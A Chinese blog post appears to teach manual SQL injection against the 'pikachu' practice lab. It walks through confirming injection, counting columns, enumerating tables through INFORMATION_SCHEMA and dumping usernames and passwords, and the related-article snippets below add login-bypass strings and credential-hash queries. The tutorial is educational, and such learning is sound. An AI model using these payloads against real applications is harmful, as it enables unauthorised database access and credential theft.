SQL注入获取MySQL用户表密码

最新推荐文章于 2024-05-17 20:36:02 发布
最新推荐文章于 2024-05-17 20:36:02 发布
阅读量1k 收藏 8
点赞数 7
分类专栏: SQL注入 文章标签: mysql 网络安全
作者:何锦洋
本文链接:https://blog.csdn.net/weixin_44537669/article/details/135372597
版权
本文详细描述了如何通过SQL注入技术逐步探测数据库结构,包括利用like操作、groupby验证字段数量,锁定数据库,以及使用INFORMATION_SCHEMA获取表名和字段信息,最终目标是获取用户表的账号和密码。
摘要由CSDN通过智能技术生成

1、首先确定:能进行SQL注入

比如推测:
	select id, username from like '%username%'

进行SQL注入尝试:username%' or 1=1 #
	select id, username from like '% username%' or 1=1 # %'

2、确定了:能进行SQL注入后

用 group by 验证(字段个数)使用二分法

尝试一:
	username%' or 1=1 group by 5#  
	
尝试二:
	username%' or 1=1 group by 3#
    
尝试三:
	username%' or 1=1 group by 2#

3、根据:确定字段,锁定数据库

username%' union select user(), database() #

4、MySQL查询 INFORMATION_SCHEMA

-- 1、根据(数据库名称)查询(INFORMATION_SCHEMA.TABLES)获取:表名称
username%' union SELECT TABLE_NAME, TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA = 'pikachu'# 

-- 2、根据(数据库名称、表名称)获取表(所有字段名称)
username%' union SELECT COLUMN_NAME, COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = 'users' AND TABLE_SCHEMA = 'pikachu' #

5、获取:用户表(账号、密码)

username%' union select username, password from pikachu.users #
漫漫求
关注
  • 7
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
基于错误的 SQL 注入(获取用户名密码的哈希值)
m0_74390206的博客
07-01 519
1.开启OWASP靶机和Kali虚拟机2.kali中登陆dvwa(用户名密码都是 admin),进入 SQL Injection(SQL 注入)页面,安全等级调为low。
Web安全 SQL注入漏洞 工具测试.
网络安全领域___专研者.
02-13 7041
SQL注入就是 有些恶意用户在提交查询请求的过程中 将SQL语句插入到请求内容中,同时程序的本身对用户输入的内容过于相信,没有对用户插入的SQL语句进行任何的过滤,从而直接被SQL语句直接被服务端执行,导致数据库的原有信息泄露,篡改,甚至被删除等风险。
手动Sql注入
cai_jshsghjs的博客
03-08 1449
id=-1’ union select 1,2,database() --+)​ concat_ws(1,2,3):将参数2和参数3 使用参数1连接起来 参数1:‘-’ 参数2:执行查询语句 参数3:floor(rand(0)*2)闭合单引号, 使用‘ 号时,发现报错,当使用id=1’ or '时正确, id=1’ and (select database()=‘users’) or。使用括号绕过空格,select(user())from dual where(1=1)and(2=2)
SQL注入流程
最新发布
qq_64395221的博客
05-17 1073
但是并没有获取到数据,因为当id=1时,查询正常,但只取出了第一列数据;要想第一列取不出数据---要么id特别大,要么id是-1;通过上面的方法,我们已经知道列数了,但是上述方法都需要我们逃逸出单引号,如果没有逃逸出来,mysql会将单引号内当成一个整体,就不会执行后面的命令了。同理空格也需要编码--- %20 (--+也可以;id=-1' union select 1,database(),3--+ 获取到当前数据库。要知道数据库信息,我们可以通过联合查询找到我们想要的信息,但是联合查询。
简单的SQL注入---id和万能密码
qq_74414939的博客
05-08 2209
id和万能密码
【JDBC】----综合案例(账号密码登录和SQL注入
swy2560666141的博客
12-06 2276
目录分享第二十一篇励志语录 一:账号密码登录1 创建user1.1、创建一张用户user,的字段如下:1.2、向user中插入两条数据:2 实现登录二、SQL注入2.1 SQL注入的效果的演示2.1.1 SQL注入代码2.1.2 SQL注入效果2.2 什么是SQL注入2.3 如何避免SQL注入三:PrepareStatement解决SQL注入(重要)3.1 PreparedStatement的应用3.1.1 参数标记3.1.2 动态参数绑定3.2 综合案例 id,用户编号,主键、自动增长。usern
详细的SQL注入基础到union注入获取密码实战
chen_zhangkonzhe的博客
09-10 654
SQL注入原理 参数用户可控:从前端传给后端的参数内容是用户可以控制的参数带入数据库查询:传入的参数拼接到SQL语句,且带入数据库查询,当用户传入参数为1'的时候在数据库执行如下方所示。字符型注入原理当我在用户可控处输入'时SQL会报错说明可能存在SQL注入
sqli-labs-master第二关通关方法,使用SQL注入查询用户名密码
weixin_66387649的博客
02-21 641
在学习SQL语句的时候,听朋友推荐,使用sqli-labs-master靶场练习,这里也是用过很长时间把sqli-labs-master环境搭好,现在呢玩到了第二关,由于第二关和第一关的内容基本一样,所以就讲解第二关的通关方法,遇到的小伙伴一起试一试吧!我们在进行SQL注入时需要查我们的字段数,这里用 order by来找出数据库中的字段数,由于order by的排序特性,我们可以一个一个输入“1,2,3.....”,这样直到它报错就可以知道有几个字段数了。进入关卡后发现,这里就已经提示我们开始第一步啦!
黑客学习-SQL注入(字符型):Hackbar获取网站账号和密码
weixin_49349476的博客
09-27 2737
检查出网站存在的漏洞类型是字符型的SQL漏洞,之后利用火狐浏览中的Hackbar插件,进行SQL注入获取登录账号和密码
sql注入讲解ppt.pptx
08-10
SQL 注入基础知识点总结 SQL 注入是指 web 应用程序对用户...通过学习 SQL 注入基础知识、工具和环境搭建、MySQL 数据库基础知识、SQL 注入防御、SQL 注入类型和基本步骤,我们可以更好地理解和防御 SQL 注入攻击。
PHP+MysqlSQL注入源码 下载
04-21
SQL注入发生在当应用程序没有正确过滤或验证用户输入的数据,而是直接将这些数据拼接到SQL查询语句中。例如,一个简单的用户登录接口,如果直接使用用户输入的用户名密码进行查询,而没有进行任何处理,那么攻击者...
MySQL 面试题-SQL注入篇.docx
09-17
SQL注入是一种严重的网络安全威胁,尤其针对使用MySQL等数据库系统的Web应用程序。攻击者通过在用户输入的数据中插入恶意SQL代码,可以操控数据库,获取敏感信息,甚至破坏整个系统。以下是关于SQL注入的详细解释和...
SQL注入(万能密码)
qq_69432323的博客
03-14 5483
SQL注入漏洞主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。从而导致数据库受损(被脱裤、被删除、甚至整个服务器权限沦陷)
注入——sql注入命令
weixin_55404107的博客
10-16 1711
sql注入—简单理解
漏洞篇(SQL注入一)
m0_58001548的博客
03-26 1195
此时我们输入的第一个单引号将 username 的单引号闭合,相当于输入了一个空用户,or 示左右两边只要有一边条件判断成立则该语句返回结果为真,其中 1=1 永远为真,所以当前 SQL 语句无论怎么执行结果永远为真,--空格示注释,注释后面所有代码不再执行。我们可以看到上面我们闭合的方法是没有输入用户名的,所以并不能成功登陆。
sql盲注 各种方法拿到 管理员账户和密码
qq_41860876的博客
11-08 1487
任务092:手动漏洞挖掘-SQL盲注笔记 介绍 web没有编写好显示过滤有数据库返回的报错信息,黑客可以通过报错信息了判断漏洞存在 下面就是没有过滤好发现了他存在sql漏洞 sql盲注就是看不见他报错的信息,报错的信息被过滤了,看不见我们在进行sql注入这个就叫sql盲注了 看一下返回就结果没有显示任何东西 ...
万能密码sql注入
hk_hkl的博客
07-17 6300
万能密码利用的原理就是在后台登陆页面没有对用户输入的内容进行验证,此时程序所用用户输入的数据都合法的,所以这个时候无论是合法的管理员还是非法的入侵者所输入的数据都是被信任的,非法入侵者正是利用这一特点来进行非法登录的。当我们在登录界面输入 【万能账号】比如 a’ or true # 以后,后端会将我们输入的参数拼接到SQL中,然后去数据库中查询账号和密码。,所以这需要使用 a’ or 1 – a 而不是 a’ or 1 --a 其原理和 a’ or 1 # 大同小异。
利用sqlmap注入获取网址管理员账号密码
WINDY_PACE的博客
04-21 6495
sqlmap 靶场的攻击注入利用。
sql注入之万能密码
wuqingsix的博客
02-20 1646
16: 用户名 ’ UNION Select 1,1,1 FROM admin Where ”=’ (替换名admin)admin’ or ‘a’=’a 密码随便。
手工sql注入常用sql语句
05-10
以下是常用的手工SQL注入语句: 1. 判断版本号 ```sql SELECT @@VERSION ``` 2. 列出当前数据库中的所有 ```sql SELECT table_name FROM information_schema.tables WHERE table_schema=database() ``` 3. 列出指定中的所有列 ```sql SELECT column_name FROM information_schema.columns WHERE table_name='table_name' ``` 4. 获取当前用户 ```sql SELECT user() ``` 5. 获取当前数据库名 ```sql SELECT database() ``` 6. 获取当前登录用户密码哈希值 ```sql SELECT password FROM mysql.user WHERE user='current_user' ``` 7. 获取当前数据库版本 ```sql SELECT @@version ``` 8. 查询指定中的前N条记录 ```sql SELECT * FROM table_name LIMIT N ``` 9. 获取当前数据库的所有用户 ```sql SELECT DISTINCT User FROM mysql.user ``` 10. 列出当前数据库中所有存储过程 ```sql SELECT name FROM mysql.proc WHERE db = 'current_database' ```

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

漫漫求

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值